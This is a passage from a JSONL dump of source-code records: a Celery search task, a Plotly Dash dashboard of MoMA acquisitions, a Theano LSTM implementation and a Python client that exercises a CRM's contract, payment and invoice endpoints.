self.bind.split(\":\")\n self.host = host\n self.port = int(port)\n\n def plugin(self, callback):\n def wrapper(*args, **kwargs):\n body = callback(self, *args, **kwargs)\n return body\n return wrapper\n\n\nif __name__ == \"__main__\":\n app = ServerApp(\"tinypost\")\n logging.info(\"{0} {1} {2}\".format(app.name,\n get_version(verbose=True),\n COPYRIGHT))\n\n bottle.install(app.plugin)\n bottle.run(app=app, host=app.host, port=app.port, debug=__debug__)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"553776176","text":"import logging\nfrom celery import shared_task\n\nlogger = logging.getLogger(__name__)\n\n\n@shared_task(name='bims.tasks.search_task', queue='update')\ndef search_task(parameters, search_process_id):\n from bims.utils.celery import memcache_lock\n from bims.api_views.search import Search\n from bims.models.search_process import (\n SearchProcess,\n SEARCH_PROCESSING,\n SEARCH_FINISHED,\n SEARCH_FAILED\n )\n\n try:\n search_process = SearchProcess.objects.get(id=search_process_id)\n except SearchProcess.DoesNotExist:\n return\n\n lock_id = '{0}-lock-{1}'.format(\n search_process.file_path,\n search_process.process_id\n )\n\n oid = '{0}'.format(search_process.process_id)\n\n with memcache_lock(lock_id, oid) as acquired:\n if acquired:\n search_process.set_status(SEARCH_PROCESSING)\n\n search = Search(parameters)\n search_results = search.get_summary_data()\n if search_results:\n search_process.set_search_raw_query(\n search.location_sites_raw_query\n )\n search_process.create_view()\n search_process.set_status(SEARCH_FINISHED, False)\n search_results['status'] = SEARCH_FINISHED\n search_results['extent'] = search.extent()\n search_process.save_to_file(search_results)\n else:\n search_process.set_status(SEARCH_FAILED)\n return\n\n\n logger.info(\n 'Search %s is already being processed by another worker',\n search_process.process_id)\n","sub_path":"bims/tasks/search_version_2.py","file_name":"search_version_2.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"125106746","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nfrom dash.exceptions import PreventUpdate\nimport gunicorn\n\nimport numpy as np\nimport pandas as pd\nfrom re import search\n\nimport plotly.graph_objects as go\nimport plotly.express as px\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\ndata = pd.read_csv('data.csv')\n\n\ndef classes_fromto(year1=1929, year2=2020):\n return px.bar(data[(data['DateAcquired'] >= year1) & (data['DateAcquired'] <= year2)]['Classification'].value_counts(), labels=dict(value='count', index='classes')).update_layout(showlegend=False, title=f'Classes distribution from {year1} to {year2}')\n\n\ndef countries_distribution(year=2020, group_smallest=True, group_method='mean'):\n temp = data[data['DateAcquired'] <= year]['Country'].value_counts()\n if group_smallest:\n other = temp[temp <= (np.mean(temp) if group_method ==\n 'mean' else np.median(temp))]\n temp.drop(other.index, inplace=True)\n temp = temp.append(pd.Series({'Other': np.sum(other)}))\n return px.bar(temp, labels=dict(value='count', index='countries')).update_layout(showlegend=False, title=f'Countries distribution in {year}')\n\n\ndef bar_with_animation():\n classes = ['Architecture', 'Design', 'Drawing', 'Illustrated Book', 'Painting', 'Photograph', 'Print', 'Sculpture']\n temp = pd.DataFrame(columns=['Year', 'Classification', 'Count'])\n for year in sorted(data['DateAcquired'].unique()):\n for class_ in classes:\n count = data[(data['DateAcquired'] == year) & (data['Classification'] == class_)].count()['Title']\n temp = temp.append({'Year': year, 'Classification': class_, 'Count': count}, ignore_index=True)\n temp['CountLog'] = temp[temp['Count'] != 0]['Count'].astype(float).apply(np.log)\n temp['Count'] = temp[temp['Count'] != 0]['Count'].astype(int)\n temp = temp.replace(np.nan, 0)\n fig = px.bar(\n temp,\n x='Classification',\n y='CountLog',\n animation_frame='Year',\n labels={'CountLog': 'Number of Artworks (log)', 'Count': 'Number of artworks'},\n color_discrete_sequence=['#3DCCC0'],\n range_y=[0.1, max(temp['CountLog'])],\n hover_data={'Year': False, 'Classification': False, 'Count': True, 'CountLog': False}\n )\n fig.update_layout(uniformtext_minsize=8, uniformtext_mode='hide')\n fig.update_layout(\n title=dict(text='Classification of Acquired Artworks',\n x=0.05, y=0.95\n ),\n template='ggplot2'\n )\n return fig\n\n\ndef acquired_plot(total=True):\n\n if total:\n temp = data.groupby('DateAcquired').count().cumsum().reset_index()\n else:\n temp = data.groupby('DateAcquired').count().reset_index()\n\n fig = go.Figure()\n\n fig.add_trace(\n go.Scatter(\n x=temp['DateAcquired'],\n y=temp['Artist']\n )\n )\n\n fig.update_layout(\n title='Total number of art acquired' if total else 'Arts acquired',\n xaxis_title='Year',\n yaxis_title='Arts',\n )\n\n return fig\n\ndef sunburst(countries=None):\n if countries:\n temp = data[data['Country'].isin(countries)]\n else:\n temp = data.copy()\n fig = px.sunburst(temp, path=['Department', 'Classification'], color_discrete_sequence=['#4a4bc7'])\n fig.update_traces(\n go.Sunburst(hovertemplate='Number of artworks=%{value}'\n ))\n fig.update_layout(\n title=dict(text='Artworks Classification Arranged by Department', font=dict(color='black'))\n )\n return fig\n\ndef genders_chart():\n df = pd.pivot_table(data, index='DateAcquired', columns='Gender', values='Artist', aggfunc='count')\n df = df.reset_index()\n\n fig = go.Figure()\n\n fig.add_trace(go.Scatter(\n x=df['DateAcquired'], y=df['Female'],\n fillcolor='rgb(111, 231, 219)',\n mode='lines',\n line=dict(width=0.5, color='rgb(111, 231, 219)'),\n stackgroup='one',\n name='Female',\n groupnorm='percent', # sets the normalization for the sum of the stackgroup\n hovertemplate='Year=%{x}' + '
    Percentage=%{y:.2f}' + '%'\n\n ))\n\n fig.add_trace(go.Scatter(\n x=df['DateAcquired'], y=df['Male'],\n fillcolor='rgb(74, 75, 199)',\n mode='lines',\n line=dict(width=0.5, color='rgb(74, 75, 199)'),\n stackgroup='one',\n name='Male',\n hovertemplate='Year: %{x}' + '
    Percentage: %{y:.2f}' + '%'\n ))\n\n fig.update_layout(\n title=dict(text='Gender of Artists Over Time',\n x=0.05, y=0.95\n ),\n showlegend=True,\n legend=dict(\n orientation=\"v\",\n yanchor=\"top\",\n y=0.95,\n xanchor=\"left\",\n x=0.02,\n font=dict(family=\"Arial\", size=12),\n bordercolor=\"white\",\n borderwidth=1,\n itemsizing='trace'\n ),\n xaxis_type='linear',\n yaxis=dict(\n type='linear',\n range=[1, 100],\n ticksuffix='%'))\n\n fig.update_yaxes(title='Percentage of Artworks Acquired')\n fig.update_xaxes(title='Year Acquired')\n fig.update_layout(template=\"simple_white\")\n\n return fig\n\ndef line_chart_nationalities():\n temp = data.groupby(['DateAcquired', 'Country'])['Title'].count().reset_index().rename({'Title': 'Count'}, axis=1)\n # Number of different countries per year\n temp2 = temp.groupby('DateAcquired')['Country'].count().reset_index()\n\n # Number of new countries by the years\n new_country = []\n new = []\n temp2['New'] = np.nan\n for year in temp['DateAcquired'].unique():\n country_year = temp[temp['DateAcquired'] == year]['Country'].values\n new_year = [country for country in country_year if country not in new_country]\n for n in new_year: new_country.append(n)\n new.append(len(new_country))\n temp2['New'] = new\n temp2.rename({'Country': 'Different nationalities by year', 'New': 'Different nationalities until that year'},\n axis=1, inplace=True)\n\n fig = px.line(temp2, x='DateAcquired',\n y=['Different nationalities by year', 'Different nationalities until that year'],\n hover_data={'DateAcquired': False, 'variable': False, 'value': True},\n color_discrete_sequence=['#9acfbf','#3eceaf'],\n labels={'DateAcquired': 'Year Artworks were Acquired', 'variable': '', 'value': 'Number of Nationalities'}\n )\n\n fig.update_layout(\n title=dict(text='Diversity of Artists\\' Origins Over Time',\n x=0.05, y=0.95\n ),\n template='ggplot2',\n hovermode=\"x\",\n legend=dict(\n orientation=\"v\",\n yanchor=\"top\",\n y=0.95,\n xanchor=\"left\",\n x=0.02,\n font=dict(family=\"Arial\", size=12),\n bordercolor=\"white\",\n borderwidth=1,\n itemsizing='trace'\n )\n )\n fig.update_traces(hovertemplate='%{y}',\n line=dict(width=3))\n\n return fig\n\ndef map_with_animation():\n # 2 options (comment the one you don't want)\n ### With growth\n temp = data.groupby(['DateAcquired', 'Country'])['Title'].count().unstack().replace(np.nan, 0).cumsum()\n temp = pd.DataFrame(temp.stack()).reset_index().rename({0: 'Count'}, axis=1)\n\n # logarithm\n temp['Countlog'] = np.log(temp['Count'])\n\n fig = px.choropleth(temp, locations='Country', locationmode='country names',\n color='Countlog',\n color_continuous_scale=['#e8e6ff', '#dcd9ff', '#b2b0ff', '#8889e0', '#6063b6', '#4a4bc7', '#33357f'],\n animation_frame='DateAcquired',\n range_color=(0, temp['Countlog'].max()),\n hover_name='Country',\n hover_data={'Country':False,'Count':True,'Countlog':False,'DateAcquired':False},\n labels={'DateAcquired': 'Year', 'Countlog': 'Acquired
    Artworks (log)','Count': 'Acquired Artworks'}\n #projection=\"natural earth\"\n )\n fig.update_layout(\n title=dict(text='Artworks\\' Nationality Evolution',\n x=0.1,y=0.95,\n font=dict(color='black')\n )\n )\n return fig\n\n\ndef statistics(countries = None):\n if countries:\n temp = data[data['Country'].isin(countries)]\n else:\n temp = data.copy()\n unique_artsits = temp['Artist'].unique().shape[0]\n unique_artworks = temp['Title'].unique().shape[0]\n gender_counts = temp['Gender'].value_counts(normalize = True) * 100\n try:\n male = str(round(gender_counts['Male'], 2)) + '%'\n except:\n male = '0.0%'\n try:\n female = str(round(gender_counts['Female'], 2)) + '%'\n except:\n female = '0.0%'\n\n\n return unique_artsits, unique_artworks, male, female\n\n\ndef unique_countries():\n # select countries with paintings works\n classification_paint = ['Drawing', 'Painting', 'Work on Paper']\n data_withpaint = data[data.Classification.isin(classification_paint)]\n\n return data_withpaint['Country'].sort_values().unique()\n\ndef filter_technique(technique):\n if search('and', technique):\n return 'Mixed'\n elif search('mixed', technique.lower()):\n return 'Mixed'\n elif search('oil', technique.lower()):\n return 'Oil'\n elif search('charcoal', technique.lower()):\n return 'Charcoal'\n elif search('acrylic', technique.lower()):\n return 'Acrylic'\n elif search('tempera', technique.lower()):\n return 'Tempera'\n elif search('pencil', technique.lower()):\n return 'Pencil'\n elif search('ink', technique.lower()):\n return 'Ink'\n elif search('watercolour', technique.lower()):\n return 'Watercolour'\n elif search('watercolor', technique.lower()):\n return 'Watercolour'\n elif search('crayon', technique.lower()):\n return 'Crayon'\n elif search('gouache', technique.lower()):\n return 'Gouache'\n elif search('paint', technique.lower()):\n return 'Paint'\n elif search('dye', technique.lower()):\n return 'Paint'\n elif search('pigment', technique.lower()):\n return 'Paint'\n elif search('pastel', technique.lower()):\n return 'Pastel'\n\n else:\n return 'Other'\n\n\ndef donut_chart(countries = None):\n if countries:\n temp = data[data['Country'].isin(countries)]\n else:\n temp = data.copy()\n data_drawings = temp[(data.Classification == 'Drawing') | (\n data.Classification == 'Painting') | (data.Classification == 'Work on Paper')]\n data_drawings['Technique'] = data_drawings['Medium'].apply(\n filter_technique)\n data_drawings = data_drawings[data_drawings['Medium']\n != 'Not known'].reset_index()\n\n # Create donut graph for different techniques\n donut_chart = go.Figure()\n sum_counts = data_drawings['Technique'].value_counts().sort_index()\n # Colour palette for graph\n colors = ['#516CCC', # Acrylic\n\n '#7799E0', # Charcoal\n\n '#6084B6', # Crayoin\n\n '#82BCFA', # goauche\n\n '#3DCCC0', # ink\n\n '#00ae91', # mixed\n\n '#00C2B2', # oil\n\n '#63E6E3', # other\n\n '#8DD8EB', # paint\n\n '#4A4BC7', # pastel\n\n '#81D7CF', # pencil\n\n '#7087CF', # tempera\n\n '#7DADE6'] # watecolour\n\n donut_chart.add_trace(go.Pie(values=sum_counts,\n labels=sum_counts.index,\n hole=0.88,\n hovertemplate=\"%{label}
    Number of artworks=%{value}\",\n marker=dict(colors=colors, line=dict(color='#ffffff', width=1))\n ))\n donut_chart.update_layout(\n title=dict(text='Most Popular Painting Techniques',font=dict(color='black')),\n showlegend=True,\n annotations=[dict(text='Techniques
    used
    by artists', x=0.5, y=0.5, font_size=20, showarrow=False)])\n\n return donut_chart\n\n\napp = dash.Dash(__name__,\n title=\"MoMA on Tour\", suppress_callback_exceptions=True)\n\napp.layout = dcc.Loading(\n html.Div(\n children=[\n # title\n html.Div(\n children=[\n html.Img(\n src=app.get_asset_url(\"moma-logo.png\"),\n style={'width': '80%', 'margin-top': '10px'}\n ),\n ],\n style={'width': '25%'}\n ),\n html.Div(\n children=[\n html.H5('The Museum of Modern Art (MoMA) acquired its first artworks in 1929.'\n ' Today, the Museum’s evolving collection contains almost 200,000 works'\n ' from around the world spanning the last 150 years. In this dashboard, '\n 'you can go on tour with the MoMA museum by getting insights into which '\n 'artworks it acquired over the years and by which artists. Next, you can '\n 'see MoMA per country by checking which country the art pieces come from. '\n 'The art collections include an ever-expanding range of visual expression, '\n 'including painting, sculpture, photography, architecture, design, and '\n 'film art. Travel through time and space with MoMA and enjoy the tour...'),\n ],\n className='card',\n style={\"height\": \"25%\",\"width\":\"70%\"},\n ),\n #1st row\n html.Div(\n children=[\n #1st column\n dcc.Graph(\n figure=line_chart_nationalities(),\n className='card',\n style={\"width\": \"50%\"},\n ),\n #2nd column\n html.Div(\n children=[\n dcc.Loading([\n dcc.Graph(figure=map_with_animation(),\n id='main-choropleth')],\n type='default', color='black', id=\"map-loading\"\n )\n ],\n className='card',\n style={'width': '50%'}\n ),\n ],\n className='container'\n ),\n\n #2nd row\n html.Div(\n children=[\n\n dcc.Graph(\n figure=genders_chart(),\n className='card',\n style={\n \"width\": \"40%\"\n }\n ),\n dcc.Graph(\n figure=bar_with_animation(),\n className='card',\n style={\n \"width\": \"55%\"\n }\n ),\n ],\n className='container'\n ),\n\n #3rd row\n html.Div(\n children=[\n html.Div(\n children=[\n html.H2(\"Choose countries\"),\n dcc.Dropdown(\n options=[{'label': v, 'value': v}\n for v in unique_countries()],\n multi=True,\n id='countries-dropdown'),\n ],\n className='first card',\n style={'width': '40%', 'float': 'right'}\n ),\n html.Div(children=[\n html.H2('Artists'),\n html.H3('123', id='unique-artists')\n ],\n className='card small'\n ),\n html.Div(\n children=[\n html.H2('Artworks'),\n html.H3('123', id='unique-artworks')\n ],\n className='card small'\n ),\n html.Div(\n children=[\n html.H2('Gender'),\n html.H3('Male:'),\n html.H3('123%', id='male-count'),\n html.H3(' Female:'),\n html.H3('123%', id='female-count')\n ],\n className=' card small'\n ),\n ],\n className='container'\n ),\n\n #4th row\n html.Div(\n children=[\n dcc.Graph(\n figure=sunburst(),\n className='card',\n style={'width': '50%'},\n id='sunburst'\n ),\n dcc.Graph(\n figure=donut_chart(),\n className='card',\n style={'width': '50%'},\n id='donut'\n )\n\n ],\n className='container'\n ),\n\n\n\n html.Footer([\n html.Label([\"Anastasiia Tagiltseva, m20200041 | Beatriz Pereira, m20200674 | Nadine Aldesouky, m20200568 | Svitlana Vasylyeva, m20200617| \"\n \"Source: \", html.A(\"MoMA\",\n href=\"https://github.com/MuseumofModernArt/collection\", target=\"_blank\")])\n\n ],\n className=\"footer\"\n ),\n ]),\n type = 'cube', color='white')\n\nserver = app.server\n\n@app.callback(\n Output('unique-artists', 'children'),\n Output('unique-artworks', 'children'),\n Output('male-count', 'children'),\n Output('female-count', 'children'),\n Output('sunburst', 'figure'),\n Output('donut', 'figure'),\n Input('countries-dropdown', 'value')\n)\ndef update_stats(value):\n stats = statistics(value)\n return stats[0], stats[1], stats[2], stats[3], sunburst(value), donut_chart(value)\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":18550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"451099081","text":"#! /usr/bin/env python\n#-*- coding: utf-8 -*-import numpy\n\nimport numpy as np\nimport pickle as pkl\nimport theano\nimport theano.tensor as T\nimport matplotlib as plt\nfrom theano.tensor.shared_randomstreams import RandomStreams\nfrom theano import function\nfrom sklearn.model_selection import train_test_split\nimport timeit\nimport os\nimport sys\n\nclass LSTMlayer:\n def __init__(self,n_input,n_hidden,n_output):\n self.n_input = n_input\n self.n_hidden = n_hidden\n #input\n #srng = RandomStreams(seed=234)\n init_wi0 = np.array(np.random.uniform(low=-np.sqrt(1./n_input),high=(np.sqrt(1./n_input)) ,size=(n_input,n_hidden)),dtype=theano.config.floatX)\n init_wi1 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. / n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_wi2 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. / n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_bi = np.zeros(shape=(n_hidden,),dtype=theano.config.floatX)\n self.wi0 = theano.shared(value=init_wi0,name='wi0')\n self.wi1 = theano.shared(value=init_wi1, name='wi1')\n self.wi2 = theano.shared(value=init_wi2, name='wi2')\n self.bi = theano.shared(value=init_bi,name='bi')\n\n #forget\n init_wf0 = np.array(np.random.uniform(low=-np.sqrt(1./n_input),high=(np.sqrt(1./n_input)) ,size=(n_input,n_hidden)),dtype=theano.config.floatX) #dot遵循正常矩阵的乘法\n init_wf1 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. / n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_wf2 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. / n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_bf = np.zeros(shape=(n_hidden,),dtype=theano.config.floatX)\n self.wf0 = theano.shared(value=init_wf0,name='wf0')\n self.wf1 = theano.shared(value=init_wf1, name='wf1')\n self.wf2 = theano.shared(value=init_wf2, name='wf2')\n self.bf = theano.shared(value=init_bf,name='bf')\n #cell\n init_wc0 = np.array(np.random.uniform(low=-np.sqrt(1./n_input),high=(np.sqrt(1./n_input)) ,size=(n_input,n_hidden)),dtype=theano.config.floatX)\n init_wc1 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. / n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_wc2 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. / n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_bc = np.zeros(shape=(n_hidden,),dtype=theano.config.floatX)\n self.wc0 = theano.shared(value=init_wc0,name='wc0')\n self.wc1 = theano.shared(value=init_wc1, name='wc1')\n self.wc2 = theano.shared(value=init_wc2, name='wc2')\n self.bc = theano.shared(value=init_bc,name='bc')\n\n #output\n init_wo0 = np.array(np.random.uniform(low=-np.sqrt(1./n_input),high=(np.sqrt(1./n_input)) ,size=(n_input,n_hidden)),dtype=theano.config.floatX)\n init_wo1 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. / n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_wo2 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. / n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_bo = np.zeros(shape=(n_hidden,),dtype=theano.config.floatX)\n self.wo0 = theano.shared(value=init_wo0,name='wo0')\n self.wo1 = theano.shared(value=init_wo1, name='wo1')\n self.wo2 = theano.shared(value=init_wo2, name='wo2')\n self.bo = theano.shared(value=init_bo,name='bo')\n\n self.params1 = [self.wi0,self.wi1,self.wi2,self.bi,self.wf0,self.wf1,self.wf2,self.bf,self.wc0,self.wc1,self.wc2,self.bc]\n\n #classifier\n init_w = np.array(np.random.uniform(low=-np.sqrt(1./n_input),high=np.sqrt(1./n_input),size=(n_hidden,n_output)),dtype=theano.config.floatX)\n init_b = np.array(np.random.uniform(low=-np.sqrt(1./n_input),high=np.sqrt(1./n_input),size=(n_output)),dtype=theano.config.floatX)\n self.w = theano.shared(value=init_w,name='w')\n self.b = theano.shared(value=init_b,name='b')\n self.params2 = [self.w,self.b]\n\n self.params = self.params1 + self.params2\n\n def _cellcalculate(x,bh,sc): #bh和sc需要自己定义初值\n ai = T.dot(self.wi0,x)+T.dot(self.wi1,bh)+T.dot(self.wi2,sc)\n _bi = T.nnet.hard_sigmoid(ai+self.bi)\n\n af = T.dot(self.wf0,x)+T.dot(self.wf1,bh)+T.dot(self.wf2,sc)\n _bf = T.nnet.hard_sigmoid(af+self.bf)\n\n ac = T.dot(self.wc0,x)+T.dot(self.wc1,bh)+T.dot(self.wc2,sc)\n _bc = T.tanh(ac+self.bc)\n sc = _bf*sc + _bi*_bc\n\n ao = T.dot(self.wo0,x)+T.dot(self.wo1,bh)+T.dot(self.wo2,sc)\n _bo = T.nnet.hard_sigmoid(ao+self.bo)\n\n bh = _bo*(T.tanh(sc))\n\n return [bh,sc]\n\n self.x = T.matrix('x')\n self.y = T.ivector('y')\n self.lr = T.scalar('lr')\n [result_b, result_s], updates = theano.scan(_cellcalculate,\n truncate_gradient=-1,\n sequences=self.x,\n outputs_info=[np.zeros(self.n_hidden),np.zeros(self.n_hidden)]) # 全都初始化为0,不知道对不对.\n\n classiffier = T.nnet.softmax(T.dot(result_b,self.w)+self.b)\n _predict = T.argmax(classiffier)\n self.predict = theano.function(\n inputs=[self.x],\n outputs=_predict,\n allow_input_downcast=True\n )\n\n self._negative_log_likelihood = -T.mean(T.log(classiffier)[T.arange(self.y.shape[0]),self.y])\n\n self.gparams =T.grad(self._negative_log_likelihood,self.params)\n updates = [(params,params-self.lr*gparam)for params,gparam in zip(self.params,self.gparams)]\n self.negative_log_likehood = theano.function(\n inputs = [self.x,self.y,self.lr],\n outputs = self._negative_log_likelihood,\n updates = updates,\n allow_input_downcast=True\n )\n _precision = 1. - T.mean(T.neq(_predict,self.y))\n self.precision = theano.function(\n inputs=[self.x,self.y],\n outputs=_precision,\n allow_input_downcast=True\n )\n\n\ndef sgd_optimization(lr=1,n_epochs=100,filemane='data.pkl',batch_size=1,n_input=2,n_hidden=2,n_output=2):\n\n train_x=np.array([[1,2],\n [4,5]])\n train_y =np.array([0,0])\n print('...building the model')\n classifier = LSTMlayer(\n n_input=n_input,\n n_hidden=n_hidden,\n n_output=n_output\n )\n updates = [\n (params,params-lr*gparams)for params,gparams in zip(classifier.params,classifier.gparams)\n ]\n train_model = theano.function(\n inputs=[classifier.x,classifier.y],\n outputs=classifier._negative_log_likelihood,\n updates = updates,\n allow_input_downcast=True\n )\n\n epoche=0\n while epoche\",str(soup))\n # scopes = re.findall(r\"hetongs\\?scope=(.*?)\\\">\", str(soup))\n return scopes\n\n def contract(self, contract_id):\n # soup = self.get_contract(contract_id)\n # self.contracts_revisit_logs(soup, contract_id)\n self.get_contract_detail(contract_id)\n self.get_expenses(contract_id)\n self.get_events(contract_id)\n self.get_attachment(contract_id)\n self.get_operation_logs(contract_id)\n # self.get_contract(contract_id)\n # self.export_selected_contracts(scope)\n # self.export_all_contracts(scope)\n # self.contracts_revisit_logs(soup, contract_id)\n self.get_contract_detail(contract_id)\n self.get_invoiced_payments_tab(contract_id)\n self.contract_add_received_payments(contract_id)\n self.get_received_payments_tab(contract_id)\n self.get_tab_products(contract_id)\n self.get_attachment(contract_id)\n self.get_events(contract_id)\n self.get_operation_logs(contract_id)\n\n\n #获取合同ID\n def contract_ids(self):\n url = self.base_url + 'contracts'\n body = {\n 'order':'asc',\n 'scope':'all_own',\n 'sort': 'contracts.updated_at desc',\n 'per_page':10,\n 'type':'advance',\n 'section_only':'true'\n }\n response = self.common.get_response_json(url, body, '获取当前页的合同')\n if not response:\n return {}\n self.response = response\n S = self.response.content\n #print S\n soup = BeautifulSoup(S, \"html.parser\")\n checked_contract = soup.find(attrs={'data-entity-table-name':'contract'})\n if checked_contract:\n a = str(checked_contract)\n contract_id_list = re.findall(r\"data-id=\\\"(.*?)\\\">\",a)\n return contract_id_list\n\n #导出所选合同\n def export_selected_contracts(self, scope):\n contract_ids = self.contract_ids()\n url = self.base_url + 'contracts?export_page=1&format_type=calculate_export_pages&order=asc&per_page=10&scope='+scope+'&sort=contracts.updated_at+desc&type=advance&selected_ids%5B%5D='+contract_ids[0]+'&selected_ids%5B%5D='+contract_ids[1]+'&format=js'\n self.common_get_resonse_json(url, 'export_selected_contracts')\n url = self.base_url + 'contracts.js?export_page=1&format_type=xlsx&order=asc&per_page=10&scope='+scope+'&selected_ids%5B%5D='+contract_ids[0]+'&selected_ids%5B%5D='+contract_ids[1]+'&sort=contracts.updated_at+desc&type=advance'\n self.common_get_resonse_json(url, 'excute download export selected file')\n #导出全部合同\n def export_all_contracts(self, scope):\n url = self.base_url + 'contracts?format_type=calculate_export_pages&order=asc&per_page=10&scope='+scope+'&sort=contracts.updated_at+desc&type=advance'\n self.common_get_resonse_json(url, 'export_all_contracts')\n\n #点击下载文档\n url = self.base_url + 'contracts?export_page=1&format_type=xlsx&order=asc&per_page=10&scope='+scope+'&sort=contracts.updated_at+desc&type=advance'\n self.common_get_resonse_json(url, 'excute download export all contract file')\n\n #获取单个合同详情\n def get_contract(self, contract_id):\n print(contract_id)\n url = self.base_url + 'contracts/'+ str(contract_id)\n body = {}\n response = self.common.get_response_json(url, body, '获取当前用户详情')\n if response !='False':\n soup = BeautifulSoup(response.content, 'html.parser')\n return soup\n #\n url = self.base_url + 'contracts/'+ str(contract_id) + '?tab=tab_base'\n params = {\n 'tab': 'tab_base'\n }\n self.common.get_response_json(url, params, '合同的基本资料')\n\n\n #合同写跟进\n def contracts_revisit_logs(self, soup, contract_id):\n status_list = re.findall(r\"data-status=\\\"(.*?)\\\">\",str(soup))\n if status_list:\n for status in status_list:\n url = self.base_url + 'api/contracts/%s/revisit_logs' %contract_id\n body = {\n 'utf8':'✓',\n 'authenticity_token': self.csrf,\n 'revisit_log[category]':'91160',\n 'revisit_log[real_revisit_at]':self.common.get_today_str_yymmddhhmm(),\n 'revisit_log[content]':'写跟进%s' %self.common.get_random_int(9999),\n 'revisit_log[loggable_attributes][status]':status,\n 'revisit_log[loggable_attributes][id]':contract_id,\n 'revisit_log[remind_at]':self.common.get_tomorrow_srt_yymmddhhmm()\n }\n response = self.common.post_response_json(url, body, '合同写跟进')\n if not response:\n return {}\n\n #查看合同资料\n def get_contract_detail(self, contract_id):\n url = self.base_url + 'contracts/'+ str(contract_id)\n params = {\n 'only_base_info': 'true'\n }\n self.common.get_response_json(url, params, '获取合同的详细资料')\n\n # 合同获取回款记录tab\n def get_received_payments_tab(self, contract_id):\n # url = self.base_url + str(contract_id) +'?tab=tab_received_payments'\n url = self.base_url +'api/received_payments?page=&perPage=15&contract_id=' + str(contract_id)\n params ={\n 'tab': 'tab_received_payments'\n }\n self.common.get_response_json(url, params, '获取合同详情的回款tab页')\n\n #合同详情页新增回款计划\n def add_received_payment_plans(self,contract_id):\n url = self.base_url + 'contracts/'+ str(contract_id)+'?tab=tab_received_payments'\n params ={\n 'tab': 'tab_received_payments'\n }\n url = self.base_url +'api/received_payment_plans/batch_create?contract_id='+ str(contract_id)\n body = {\n 'utf8': ' ✓',\n 'authenticity_token': self.csrf,\n 'plans[0][customer_id]': self.testAddCustomer.add_customers(),\n 'plans[0][contract_id]': self.testAddContract.add_contracts(),\n 'plans[0][receive_stage]': '1',\n 'plans[0][receive_date]': '2018-08-01',\n 'plans[0][amount]': '5000',\n 'plans[0][note]':'',\n 'plans[1][customer_id]': self.testAddCustomer.add_customers(),\n 'plans[1][contract_id]': self.testAddContract.add_contracts(),\n 'plans[1][receive_stage]': '1',\n 'plans[1][receive_date]': '2018-08-01',\n 'plans[1][amount]': '6000',\n 'plans[1][note]': ''\n }\n response = self.common.post_response_json(url, body, '新增回款计划 api是' + url)\n if not response:\n return {}\n self.response = response\n received_payments_id = self.response.json()['data']['id']\n return received_payments_id\n\n #合同详情页新增回款记录\n def contract_add_received_payments(self, contract_id):\n url = self.base_url +'/contracts/' +str(contract_id) + '/received_payments'\n body ={\n 'authenticity_token':self.csrf,\n\n 'contract_id': 30939,\n 'received_payment[receive_date]': '2018-06-22',\n 'received_payment[amount]': '2000',\n 'received_payment[customer_id]': self.customer_id,\n 'received_payment[contract_id]': self.contracts_id,\n 'received_payment[received_payment_plan_id]': '',\n 'received_payment[payment_type]':'',\n 'received_payment[received_types]':'',\n 'received_payment[receive_user_id]': self.user_id,\n 'received_payment[note]':'备注',\n }\n response = self.common.post_response_json(url, body, '合同详情页新增回款记录 api是'+url)\n if not response:\n return {}\n self.response = response\n received_payments_amount = self.response.json()['data']['amount']\n return received_payments_amount\n\n\n # 合同获取开票记录tab\n def get_invoiced_payments_tab(self, contract_id):\n url = self.base_url +'api/invoiced_payments?page=&perPage=15&contract_id=' + str(contract_id)\n params ={\n 'tab': 'tab_invoiced_payments'\n }\n self.common.get_response_json(url, params, '获取合同详情的开票tab页')\n\n #合同详情页新增开票记录\n def contract_add_invoiced_payments(self, contract_id):\n url = self.base_url +'/contracts/' +str(contract_id) + '/invoiced_payments'\n body ={\n 'authenticity_token':self.csrf,\n 'invoiced_payment[amount]': '2000',\n 'invoiced_payment[invoice_types]': '205671',\n 'invoiced_payment[invoice_no]':'',\n 'invoiced_payment[note]':'备注',\n 'invoiced_payment[invoiced_date]': '2018-06-23',\n 'invoiced_payment[broker_user_id]': self.user_id,\n 'invoiced_payment[content]': '开票' %self.common.get_random_int(99999),\n }\n response = self.common.post_response_json(url, body, '合同详情页新增开票记录 api是'+url)\n if not response:\n return {}\n self.response = response\n invoiced_payment_amount = self.response.json()['data']['amount']\n return invoiced_payment_amount\n\n #查看合同关联的产品\n def get_tab_products(self,contract_id):\n url = self.base_url + 'api/product_assets?page=&perPage=15&assetable_id='+str(contract_id)+'&assetable_type=Contract'\n print(url)\n params = {\n 'tab': 'tab_products'\n }\n self.common.get_response_json(url, params, '获取合同详情的产品tab页')\n\n 